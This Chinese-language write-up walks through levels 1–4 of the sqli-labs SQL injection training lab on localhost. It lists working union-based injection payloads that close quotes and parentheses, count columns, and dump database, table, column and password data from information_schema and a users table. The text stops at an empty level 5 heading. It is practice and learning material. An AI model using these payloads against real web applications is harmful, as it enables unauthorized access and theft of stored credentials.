level1
輸入:[http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1](http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1)
後面加一個'並將後面註釋掉試試效果:
構造?id=1' --+(這裏#被註釋了)
然後判斷字段數
?id=1' order by 3 --+
order by 3的時候回顯正常,order by 4的時候報錯,那證明字段就是3個。
然後判斷注入點
?id=0' union select 1,2,3 --+
2和3是注入點,隨便找個位置開始注入
?id=0' union select 1,database(),3 --+
數據庫名爆出來了,security
然後爆表名:
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
因爲這裏只顯示一行,雖然後面的LIMIT 0,1被註釋掉了,但是後臺可能還有其他函數限制輸出,所以用group_concat()來將所有輸出整在一行內
猜測flag應該在users表中
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
maybe在password字段中
?id=-1' union select 1,group_concat(password),3 from users --+
okok搞定
level2
首先構造?id=1'--+發現報錯,那這個應該不是字符類型
然後判斷字段數?id=1 order by 3 --+
然後構造?id=1 union select 1,2,3 --+
發現注入點,接下來的操作跟上一題一樣,就不做介紹了,直接貼payload
?id=1 union select 1,database(),3 --+
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
?id=-1 union select 1,group_concat(password),3 from users --+
level3
首先,構造一下?id=1'
不吹牛,整個人懵掉了,這個報錯似曾相識但是不會做(說白了還是我太菜)。百度了一波才發現這個用')來閉合,一下子豁然開朗~
然後構造?id=1') order by 3 --+
回顯正常,並且字段數就是3沒錯。接下來的操作就跟前面的一樣了,貼payload:
?id=0') union select 1,database(),3 --+
?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+
?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
?id=0') union select 1,group_concat(password),3 from users --+
level4
老規矩,先構造?id-1'
嗯?沒報錯?換雙引號試試:
?id=1"
模仿上一題?id=1")--+
哦豁,那接下來就差不多啦。
?id=1") order by 3--+
?id=0") union select 1,database(),3--+
後面就不貼啦~
level5